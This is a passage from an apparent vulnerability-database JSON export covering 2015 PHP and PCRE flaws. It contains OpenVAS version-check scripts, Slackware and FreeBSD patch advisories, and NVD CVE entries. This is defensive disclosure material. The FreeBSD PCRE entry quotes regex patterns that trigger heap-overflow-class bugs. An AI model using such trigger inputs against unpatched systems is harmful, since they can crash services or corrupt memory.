rpm:\"php54-php-dba~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-devel\", rpm:\"php54-php-devel~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-enchant\", rpm:\"php54-php-enchant~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-fpm\", rpm:\"php54-php-fpm~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-gd\", rpm:\"php54-php-gd~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-imap\", rpm:\"php54-php-imap~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-intl\", rpm:\"php54-php-intl~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-ldap\", rpm:\"php54-php-ldap~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-mbstring\", rpm:\"php54-php-mbstring~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-mysqlnd\", rpm:\"php54-php-mysqlnd~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-odbc\", rpm:\"php54-php-odbc~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-pdo\", rpm:\"php54-php-pdo~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-pgsql\", rpm:\"php54-php-pgsql~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-process\", rpm:\"php54-php-process~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-pspell\", rpm:\"php54-php-pspell~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-recode\", rpm:\"php54-php-recode~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-snmp\", rpm:\"php54-php-snmp~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-soap\", rpm:\"php54-php-soap~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-tidy\", rpm:\"php54-php-tidy~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-xml\", rpm:\"php54-php-xml~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-xmlrpc\", rpm:\"php54-php-xmlrpc~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-26T14:42:26", "references": ["https://support.f5.com/kb/en-us/solutions/public/16000/800/sol16826.html?sr=48315819"], "pluginID": "1361412562310105367", "description": "The remote host is missing a security patch.", "edition": 6, "reporter": "This script is Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-09-18T00:00:00", "title": "F5 BIG-IP - SOL16826 - PHP vulnerability CVE-2015-4024", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "F5 Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4024"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310105367", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105367", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_f5_big_ip_sol16826.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# F5 BIG-IP - SOL16826 - PHP vulnerability CVE-2015-4024\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105367\");\n script_cve_id(\"CVE-2015-4024\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"F5 BIG-IP - SOL16826 - PHP vulnerability CVE-2015-4024\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/16000/800/sol16826.html?sr=48315819\");\n\n script_tag(name:\"impact\", value:\"This vulnerability may allow attackers to cause a denial-of-service (DoS) using crafted form data that triggers an improper order-of-growth outcome.Note: This vulnerability is exploitable only through the BIG-IP control plane (non-Traffic Management Microkernel (TMM) related tasks).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome. (CVE-2015-4024)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 15:38:41 +0200 (Fri, 18 Sep 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.6.0;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.6.0;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['GTM'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '11.6.1;11.5.4;');\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.6.0;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '12.0.0;11.6.1;11.5.4;');\n\nif( report = is_f5_vulnerable( ca:check_f5, version:version ) )\n{\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:53", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "5.4.41", "arch": "x86_64", "packageFilename": "php-5.4.41-x86_64-1_slack14.0.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "5.4.41", "arch": "i486", "packageFilename": "php-5.4.41-i486-1_slack14.1.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "5.4.41", "arch": "x86_64", "packageFilename": "php-5.4.41-x86_64-1_slack14.1.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "5.4.41", "arch": "i486", "packageFilename": "php-5.4.41-i486-1_slack14.0.txz", "packageName": "php", "operator": "lt"}], "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded.\n This update fixes some bugs and security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz\n\nSlackware x86_64 -current package:\nae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.41-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "edition": 3, "reporter": "Slackware Linux Project", "published": "2015-06-11T16:01:25", "title": "php", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2325", "CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2015-06-11T16:01:25", "id": "SSA-2015-162-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.414774", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:36:42", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "5.4.43", "arch": "x86_64", "packageFilename": "php-5.4.43-x86_64-1_slack14.0.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "5.4.43", "arch": "i486", "packageFilename": "php-5.4.43-i486-1_slack14.0.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "5.4.43", "arch": "x86_64", "packageFilename": "php-5.4.43-x86_64-1_slack14.1.txz", "packageName": "php", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "5.4.43", "arch": "i486", "packageFilename": "php-5.4.43-i486-1_slack14.1.txz", "packageName": "php", "operator": "lt"}], "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.43-i486-1_slack14.1.txz: Upgraded.\n This update fixes some bugs and security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3416\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.43-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.43-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.43-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.43-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nf34f96584f242735830b866d3daf7cef php-5.4.43-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n8271dca3b5409ce7b73d30628aa0ace4 php-5.4.43-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n6eb81ab4a6f09e4a8b4d4d5e7cbbda57 php-5.4.43-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n3a4a3f2d94af2fafb2a624d4c83c9ca3 php-5.4.43-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n020ea5fa030e4970859f79c598a1e9b5 n/php-5.6.11-i586-1.txz\n\nSlackware x86_64 -current package:\n681ed93dadf75420ca2ee5d03b369da0 n/php-5.6.11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.43-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "edition": 3, "reporter": "Slackware Linux Project", "published": "2015-07-17T13:25:21", "title": "php", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-3415", "CVE-2015-2325", "CVE-2015-4644", "CVE-2015-4642", "CVE-2015-3416", "CVE-2015-3152", "CVE-2015-3414", "CVE-2015-4643", "CVE-2015-2326"], "modified": "2015-07-17T13:25:21", "id": "SSA-2015-198-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.420251", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:41", "references": ["https://php.net/ChangeLog-5.php#5.6.9"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "5.4.41", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "5.6.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php56", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "5.5.25", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php55", "operator": "lt"}], "description": "\nPHP development team reports:\n\nFixed bug #69364 (PHP Multipart/form-data remote DoS\n\t Vulnerability). (CVE-2015-4024)\nFixed bug #69418 (CVE-2006-7243 fix regressions in\n\t 5.4+). (CVE-2015-4025)\nFixed bug #69545 (Integer overflow in ftp_genlist()\n\t resulting in heap overflow). (CVE-2015-4022)\nFixed bug #68598 (pcntl_exec() should not allow null\n\t char). (CVE-2015-4026)\nFixed bug #69453 (Memory Corruption in phar_parse_tarfile\n\t when entry filename starts with null). (CVE-2015-4021)\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2015-05-14T00:00:00", "title": "php -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-05-14T00:00:00", "id": "31DE2E13-00D2-11E5-A072-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/31de2e13-00d2-11e5-a072-d050996490d0.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:24:19", "references": ["http://www.pcre.org/original/changelog.txt"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "8.37", "packageName": "pcre", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "\nPCRE development team reports:\n\nA pattern such as \"((?2){0,1999}())?\", which has a group\n\t containing a forward reference repeated a large (but limited)\n\t number of times within a repeated outer group that has a zero\n\t minimum quantifier, caused incorrect code to be compiled,\n\t leading to the error \"internal error: previously-checked\n\t referenced subpattern not found\" when an incorrect memory\n\t address was read. This bug was reported as \"heap overflow\",\n\t discovered by Kai Lu of Fortinet's FortiGuard Labs and given\n\t the CVE number CVE-2015-2325.\nA pattern such as \"((?+1)(\\1))/\" containing a forward\n\t reference subroutine call within a group that also contained\n\t a recursive back reference caused incorrect code to be\n\t compiled. This bug was reported as \"heap overflow\",\n\t discovered by Kai Lu of Fortinet's FortiGuard Labs,\n\t and given the CVE number CVE-2015-2326.\n\n", "reporter": "FreeBSD", "published": "2015-04-28T00:00:00", "title": "pcre -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2325", "CVE-2015-2326"], "modified": "2015-06-07T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/4a88e3ed-00d3-11e5-a072-d050996490d0.html", "id": "4A88E3ED-00D3-11E5-A072-D050996490D0", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-01-05T11:51:41", "references": ["http://php.net/ChangeLog-5.php", "http://www.securityfocus.com/bid/74904", "http://www.debian.org/security/2015/dsa-3280", "http://rhn.redhat.com/errata/RHSA-2015-1186.html", "https://support.apple.com/kb/HT205031", "http://rhn.redhat.com/errata/RHSA-2015-1219.html", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "https://security.gentoo.org/glsa/201606-10", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html", "http://rhn.redhat.com/errata/RHSA-2015-1135.html", "http://rhn.redhat.com/errata/RHSA-2015-1187.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html", "http://www.securitytracker.com/id/1032431", "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", "https://bugs.php.net/bug.php?id=69418", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html"], "edition": 3, "description": "PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.", "reporter": "NVD", "published": "2015-06-09T14:59:07", "title": "CVE-2015-4025", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-4025"], "scanner": [], "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.0:beta3", "cpe:/a:php:php:5.5.0:beta4", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.6.0:alpha3", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.0:alpha5", "cpe:/a:php:php:5.5.0:rc2", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.0:beta2", "cpe:/a:php:php:5.4.40", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.0:beta3", "cpe:/a:php:php:5.6.0:beta4", "cpe:/a:php:php:5.6.0:alpha5", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:php:php:5.6.0:beta1", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.19", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.0:rc1", "cpe:/a:php:php:5.5.0:alpha6", "cpe:/a:php:php:5.5.0:alpha4", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.6.0:alpha1", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.0:beta1", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.24", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/a:php:php:5.5.22", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:php:php:5.5.0:alpha2", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.0:alpha1", "cpe:/a:php:php:5.6.0:alpha2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.4.39", "cpe:/a:php:php:5.5.2", "cpe:/o:redhat:enterprise_linux_server_eus:7.1", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.1", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.5.11", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.6.0:beta2", "cpe:/a:php:php:5.5.0:alpha3", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.0:alpha4", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.6.2"], "modified": "2018-01-04T21:30:08", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4025", "id": "CVE-2015-4025", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T11:51:41", "references": ["http://php.net/ChangeLog-5.php", "http://www.securityfocus.com/bid/74903", "https://bugs.php.net/bug.php?id=69364", "http://www.debian.org/security/2015/dsa-3280", "http://rhn.redhat.com/errata/RHSA-2015-1186.html", "https://support.apple.com/kb/HT205031", "http://rhn.redhat.com/errata/RHSA-2015-1219.html", "http://lists.opensuse.org/opensuse-updates/2015-06/msg00002.html", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05045763", "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html", "http://www.securitytracker.com/id/1032432", "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html", "http://rhn.redhat.com/errata/RHSA-2015-1135.html", "http://rhn.redhat.com/errata/RHSA-2015-1187.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html", "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", "http://rhn.redhat.com/errata/RHSA-2015-1218.html", "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html"], "edition": 3, "description": "Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome.", "reporter": "NVD", "published": "2015-06-09T14:59:06", "title": "CVE-2015-4024", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-4024"], "scanner": [], "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:hp:system_management_homepage:7.5.3.1", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.0:beta3", "cpe:/a:php:php:5.5.0:beta4", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.6.0:alpha3", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.0:alpha5", "cpe:/a:php:php:5.5.0:rc2", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.0:beta2", "cpe:/a:php:php:5.4.40", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.0:beta3", "cpe:/a:php:php:5.6.0:beta4", "cpe:/a:php:php:5.6.0:alpha5", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:php:php:5.6.0:beta1", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.19", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:oracle:solaris:11.2", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.0:rc1", "cpe:/a:php:php:5.5.0:alpha6", 